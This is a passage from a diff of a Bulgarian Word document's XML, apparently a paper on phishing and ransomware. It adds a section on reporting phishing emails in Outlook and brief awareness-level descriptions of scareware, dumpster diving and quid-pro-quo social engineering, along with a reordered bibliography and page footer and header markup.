+        <w:t xml:space="preserve">При каквото и да е съмнение за фишинг имейл е важно потребителят да го </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>репортне</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> за фишинг (фиг. 11)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Обикновено потребителят получава обратна връзка дали са предприети действия.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:sdt>
+        <w:sdtPr>
+          <w:id w:val="1105840719"/>
+          <w:citation/>
+        </w:sdtPr>
+        <w:sdtContent>
+          <w:r>
+            <w:fldChar w:fldCharType="begin"/>
+          </w:r>
+          <w:r>
+            <w:instrText xml:space="preserve"> CITATION Spe \l 1026 </w:instrText>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="separate"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <w:t>[7]</w:t>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="end"/>
+          </w:r>
+        </w:sdtContent>
+      </w:sdt>
+      <w:sdt>
+        <w:sdtPr>
+          <w:id w:val="-1520311957"/>
+          <w:citation/>
+        </w:sdtPr>
+        <w:sdtContent>
+          <w:r>
+            <w:fldChar w:fldCharType="begin"/>
+          </w:r>
+          <w:r>
+            <w:instrText xml:space="preserve"> CITATION Car \l 1026 </w:instrText>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="separate"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <w:t xml:space="preserve"> </w:t>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <w:t>[9]</w:t>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="end"/>
+          </w:r>
+        </w:sdtContent>
+      </w:sdt>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D9AF690" wp14:editId="3C264A59">
+            <wp:extent cx="2419350" cy="3219412"/>
+            <wp:effectExtent l="0" t="0" r="0" b="635"/>
+            <wp:docPr id="2031390059" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="2031390059" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId25"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2422124" cy="3223103"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(Фиг. 11 – показва как се </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>репортва</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> фишинг имейл в </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Outlook</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Други форми на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Social Engineering</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="360"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Social Engineering</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> е тактика използваща манипулация, насърчаване или измама целяща заблуждаване на жертва с цел придобиване на правомощия върху частна система</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>кражба на лична и/или финансова информация. Разчита на психологическа манипулация, за да надхитри потребителите да направят грешки или доброволно да дадат повелителна информация.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="360"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">По-горе бяха разгледани типични </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>phishing</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> атаки, но те не представляват единствената форма на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>social engineering.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Съществуват и други техники, които могат да бъдат използвани като начална точка при </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ransomware</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> атаки:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Scareware</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> представлява атака, при която жертвата е тероризирана от фалшиви заплахи и несъществуващи заплахи. Потребителят е залъгван, че системата му е хакната и незабавно трябва да му бъде оказа помощ като се включват в неговото устройство чрез отдалечен достъп </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(remote access). </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Хакерът може да се представи като част от </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Security</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> екип.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Dumpster Diving</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> представлява атака, при която мошеника е претърсил интернет за информация свързана с жертвата -</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> банкова информация, студентска информация, социални мрежи – особено </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>LinkedIn</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, където се съдържа информация за това къде живее жертвата, позицията, която заема, какво и къде е учил.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Quid Pro Quo: </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Нападателят предлага услуги или помощ в замяна на чувствителна информация.  Жертвата получава телефонно обаждане от непознато лице, които се представя като </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">IT </w:t>
+      </w:r>
+      <w:r>
+        <w:t>специалист и предлага техническа помощ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Също както </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Scareware,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> обикновено ще изискат от потърпевшия да инсталира някой скрипт или да му се предостави достъп до системата.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:sdt>
+        <w:sdtPr>
+          <w:id w:val="674697900"/>
+          <w:citation/>
+        </w:sdtPr>
+        <w:sdtContent>
+          <w:r>
+            <w:fldChar w:fldCharType="begin"/>
+          </w:r>
+          <w:r>
+            <w:instrText xml:space="preserve"> CITATION Car \l 1026 </w:instrText>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="separate"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <w:t>[9]</w:t>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="end"/>
+          </w:r>
+        </w:sdtContent>
+      </w:sdt>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="360"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:bookmarkStart w:id="13" w:name="_Toc223361350" w:displacedByCustomXml="next"/>
     <w:sdt>
       <w:sdtPr>
         <w:rPr>
@@ -4981,7 +6228,7 @@
           <w:r>
             <w:t>Цитирани източници</w:t>
           </w:r>
-          <w:bookmarkEnd w:id="12"/>
+          <w:bookmarkEnd w:id="13"/>
         </w:p>
         <w:p>
           <w:pPr>
@@ -5014,11 +6261,11 @@
           </w:tblPr>
           <w:tblGrid>
             <w:gridCol w:w="475"/>
-            <w:gridCol w:w="8597"/>
+            <w:gridCol w:w="8596"/>
           </w:tblGrid>
           <w:tr>
             <w:trPr>
-              <w:divId w:val="170070395"/>
+              <w:divId w:val="1033652386"/>
               <w:tblCellSpacing w:w="15" w:type="dxa"/>
             </w:trPr>
             <w:tc>
@@ -5066,7 +6313,7 @@
           </w:tr>
           <w:tr>
             <w:trPr>
-              <w:divId w:val="170070395"/>
+              <w:divId w:val="1033652386"/>
               <w:tblCellSpacing w:w="15" w:type="dxa"/>
             </w:trPr>
             <w:tc>
@@ -5112,7 +6359,7 @@
           </w:tr>
           <w:tr>
             <w:trPr>
-              <w:divId w:val="170070395"/>
+              <w:divId w:val="1033652386"/>
               <w:tblCellSpacing w:w="15" w:type="dxa"/>
             </w:trPr>
             <w:tc>
@@ -5158,7 +6405,7 @@
           </w:tr>
           <w:tr>
             <w:trPr>
-              <w:divId w:val="170070395"/>
+              <w:divId w:val="1033652386"/>
               <w:tblCellSpacing w:w="15" w:type="dxa"/>
             </w:trPr>
             <w:tc>
@@ -5197,14 +6444,14 @@
                   <w:rPr>
                     <w:noProof/>
                   </w:rPr>
-                  <w:t>„Botnet,“ Eset, [Онлайн]. Available: https://help.eset.com/glossary/bg-BG/botnet.html.</w:t>
+                  <w:t>„archiveus-trojan,“ Knowbe4, [Онлайн]. Available: https://www.knowbe4.com/ransomware-knowledgebase/archiveus-trojan.</w:t>
                 </w:r>
               </w:p>
             </w:tc>
           </w:tr>
           <w:tr>
             <w:trPr>
-              <w:divId w:val="170070395"/>
+              <w:divId w:val="1033652386"/>
               <w:tblCellSpacing w:w="15" w:type="dxa"/>
             </w:trPr>
             <w:tc>
@@ -5243,14 +6490,14 @@
                   <w:rPr>
                     <w:noProof/>
                   </w:rPr>
-                  <w:t>„CC Server,“ Eset, [Онлайн]. Available: https://help.eset.com/glossary/bg-BG/cc_server.html.</w:t>
+                  <w:t>Ф. Петров, „RSA,“ 16 02 2020. [Онлайн]. Available: https://www.cphpvb.net/network-security/10840-rsa-with-example/.</w:t>
                 </w:r>
               </w:p>
             </w:tc>
           </w:tr>
           <w:tr>
             <w:trPr>
-              <w:divId w:val="170070395"/>
+              <w:divId w:val="1033652386"/>
               <w:tblCellSpacing w:w="15" w:type="dxa"/>
             </w:trPr>
             <w:tc>
@@ -5289,14 +6536,14 @@
                   <w:rPr>
                     <w:noProof/>
                   </w:rPr>
-                  <w:t>Ф. Петров, „RSA,“ 16 02 2020. [Онлайн]. Available: https://www.cphpvb.net/network-security/10840-rsa-with-example/.</w:t>
+                  <w:t>„What is RSA Asymmetric Encryption? How Does it Work?,“ Secure W2, 15 09 2025. [Онлайн]. Available: https://www.securew2.com/blog/what-is-rsa-asymmetric-encryption.</w:t>
                 </w:r>
               </w:p>
             </w:tc>
           </w:tr>
           <w:tr>
             <w:trPr>
-              <w:divId w:val="170070395"/>
+              <w:divId w:val="1033652386"/>
               <w:tblCellSpacing w:w="15" w:type="dxa"/>
             </w:trPr>
             <w:tc>
@@ -5335,14 +6582,14 @@
                   <w:rPr>
                     <w:noProof/>
                   </w:rPr>
-                  <w:t>„What is RSA Asymmetric Encryption? How Does it Work?,“ Secure W2, 15 09 2025. [Онлайн]. Available: https://www.securew2.com/blog/what-is-rsa-asymmetric-encryption.</w:t>
+                  <w:t>Matthew Kosinski, „Spear phishing,“ Ibm, [Онлайн]. Available: https://www.ibm.com/think/topics/spear-phishing.</w:t>
                 </w:r>
               </w:p>
             </w:tc>
           </w:tr>
           <w:tr>
             <w:trPr>
-              <w:divId w:val="170070395"/>
+              <w:divId w:val="1033652386"/>
               <w:tblCellSpacing w:w="15" w:type="dxa"/>
             </w:trPr>
             <w:tc>
@@ -5381,14 +6628,14 @@
                   <w:rPr>
                     <w:noProof/>
                   </w:rPr>
-                  <w:t>„archiveus-trojan,“ Knowbe4, [Онлайн]. Available: https://www.knowbe4.com/ransomware-knowledgebase/archiveus-trojan.</w:t>
+                  <w:t>„Gpcode,“ Knowbe4, [Онлайн]. Available: https://www.knowbe4.com/ransomware-knowledgebase/gpcode.</w:t>
                 </w:r>
               </w:p>
             </w:tc>
           </w:tr>
           <w:tr>
             <w:trPr>
-              <w:divId w:val="170070395"/>
+              <w:divId w:val="1033652386"/>
               <w:tblCellSpacing w:w="15" w:type="dxa"/>
             </w:trPr>
             <w:tc>
@@ -5427,14 +6674,14 @@
                   <w:rPr>
                     <w:noProof/>
                   </w:rPr>
-                  <w:t>Matthew Kosinski, „Spear phishing,“ Ibm, [Онлайн]. Available: https://www.ibm.com/think/topics/spear-phishing.</w:t>
+                  <w:t>C. M. University, „Social Engineering,“ [Онлайн]. Available: https://www.cmu.edu/iso/aware/dont-take-the-bait/social-engineering.html.</w:t>
                 </w:r>
               </w:p>
             </w:tc>
           </w:tr>
           <w:tr>
             <w:trPr>
-              <w:divId w:val="170070395"/>
+              <w:divId w:val="1033652386"/>
               <w:tblCellSpacing w:w="15" w:type="dxa"/>
             </w:trPr>
             <w:tc>
@@ -5473,7 +6720,53 @@
                   <w:rPr>
                     <w:noProof/>
                   </w:rPr>
-                  <w:t>„Gpcode,“ Knowbe4, [Онлайн]. Available: https://www.knowbe4.com/ransomware-knowledgebase/gpcode.</w:t>
+                  <w:t>„Botnet,“ Eset, [Онлайн]. Available: https://help.eset.com/glossary/bg-BG/botnet.html.</w:t>
+                </w:r>
+              </w:p>
+            </w:tc>
+          </w:tr>
+          <w:tr>
+            <w:trPr>
+              <w:divId w:val="1033652386"/>
+              <w:tblCellSpacing w:w="15" w:type="dxa"/>
+            </w:trPr>
+            <w:tc>
+              <w:tcPr>
+                <w:tcW w:w="50" w:type="pct"/>
+                <w:hideMark/>
+              </w:tcPr>
+              <w:p>
+                <w:pPr>
+                  <w:pStyle w:val="Bibliography"/>
+                  <w:rPr>
+                    <w:noProof/>
+                  </w:rPr>
+                </w:pPr>
+                <w:r>
+                  <w:rPr>
+                    <w:noProof/>
+                  </w:rPr>
+                  <w:t xml:space="preserve">[11] </w:t>
+                </w:r>
+              </w:p>
+            </w:tc>
+            <w:tc>
+              <w:tcPr>
+                <w:tcW w:w="0" w:type="auto"/>
+                <w:hideMark/>
+              </w:tcPr>
+              <w:p>
+                <w:pPr>
+                  <w:pStyle w:val="Bibliography"/>
+                  <w:rPr>
+                    <w:noProof/>
+                  </w:rPr>
+                </w:pPr>
+                <w:r>
+                  <w:rPr>
+                    <w:noProof/>
+                  </w:rPr>
+                  <w:t>„CC Server,“ Eset, [Онлайн]. Available: https://help.eset.com/glossary/bg-BG/cc_server.html.</w:t>
                 </w:r>
               </w:p>
             </w:tc>
@@ -5481,7 +6774,7 @@
         </w:tbl>
         <w:p>
           <w:pPr>
-            <w:divId w:val="170070395"/>
+            <w:divId w:val="1033652386"/>
             <w:rPr>
               <w:rFonts w:eastAsia="Times New Roman"/>
               <w:noProof/>
@@ -5501,7 +6794,7 @@
     </w:sdt>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
-      <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
+      <w:pgMar w:top="1418" w:right="1134" w:bottom="1418" w:left="1701" w:header="709" w:footer="709" w:gutter="0"/>
       <w:cols w:space="708"/>
       <w:docGrid w:linePitch="360"/>
     </w:sectPr>
@@ -5534,6 +6827,59 @@
 </w:endnotes>
 </file>
 
+<file path=word/footer1.xml><?xml version="1.0" encoding="utf-8"?>
+<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
+  <w:sdt>
+    <w:sdtPr>
+      <w:id w:val="-1451170677"/>
+      <w:docPartObj>
+        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
+        <w:docPartUnique/>
+      </w:docPartObj>
+    </w:sdtPr>
+    <w:sdtEndPr>
+      <w:rPr>
+        <w:noProof/>
+      </w:rPr>
+    </w:sdtEndPr>
+    <w:sdtContent>
+      <w:p>
+        <w:pPr>
+          <w:pStyle w:val="Footer"/>
+          <w:jc w:val="right"/>
+        </w:pPr>
+        <w:r>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
+        </w:r>
+        <w:r>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>2</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:p>
+    </w:sdtContent>
+  </w:sdt>
+  <w:p>
+    <w:pPr>
+      <w:pStyle w:val="Footer"/>
+    </w:pPr>
+  </w:p>
+</w:ftr>
+</file>
+
 <file path=word/footnotes.xml><?xml version="1.0" encoding="utf-8"?>
 <w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:footnote w:type="separator" w:id="-1">
@@ -5557,6 +6903,138 @@
     </w:p>
   </w:footnote>
 </w:footnotes>
+</file>
+
+<file path=word/header1.xml><?xml version="1.0" encoding="utf-8"?>
+<w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
+  <w:p>
+    <w:pPr>
+      <w:pBdr>
+        <w:top w:val="nil"/>
+        <w:left w:val="nil"/>
+        <w:bottom w:val="nil"/>
